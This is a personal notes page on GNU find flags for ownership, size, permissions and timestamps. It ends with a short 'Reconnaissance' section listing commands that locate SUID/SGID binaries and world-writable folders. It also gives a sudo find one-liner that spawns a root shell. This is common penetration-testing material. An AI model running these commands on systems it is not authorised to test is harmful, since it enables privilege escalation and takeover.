3 min read

Basics

Some useful find flags related to file metadata.

Ownership

The -user and -group flags match files and folders owned by a particular user or group (both numeric and symbolic-readable names are allowed).

File size

The -size flag matches files of size n.

Prefix n with + or - to match files strictly greater than or less than n in size. To specify useful sizes, use a suffix.

  • c — Bytes
  • k — Kilobytes
  • M — Megabytes
  • G — Gigabytes

For example, use -size +4G to find files over 4 GB (i.e., those that can’t be written to a FAT32 file system).

Permissions

The -perm flag matches files and folders with a given permission. Both numeric and symbolic permissions are allowed.

Use the / or - prefix to match files with any of the specified permissions or at least the specified permissions. For example, -perm -644 will match any file where the current user has at least read + write access and any other user has at least read access (so, - requires the specified permissions, but is agnostic as to the presence/absence of additional permissions). Likewise, -perm /666 will match files where the current user has read + write access and/or the current group has read + write access and/or everyone has read + write access (so, / requires that at least one of the specified permissions groups matches exactly, but is agnostic to the state of any other group outside of that match).

Timestamps

The -Xmin and -Xtime flags match files accessed (a), had their contents modified (m), or had their inode changed (c) n minutes (-Xmin) or days (-Xtime) ago.

All mtime changes are ctime changes, but the reverse is not necessarily true.

Prefix n with + or - to match files strictly before or after the specified time in the past.

For example:

# Matches files accessed *more* than 30 minutes ago
#
find . -type f -amin +30
 
# Matches files modified *less* than 7 days ago
#
find . -type f -mtime -7
 
# Matches files modified *today*
#
find . -type f -mtime 0

Reconnaissance

Find SUID and SGID executables

find / -type f \
       -a \( -perm -u+s -o -perm -g+s \) \
       -exec ls -l {} \; 2> /dev/null

Find world writable/executable folders

find / -type d -a \( -perm -o+w -perm -o+x \) 2>/dev/null

Shell escape

If find can be run with NOPASSWD via sudo, then try:

sudo find . -exec /bin/sh \; -quit

Backlinks

Graph View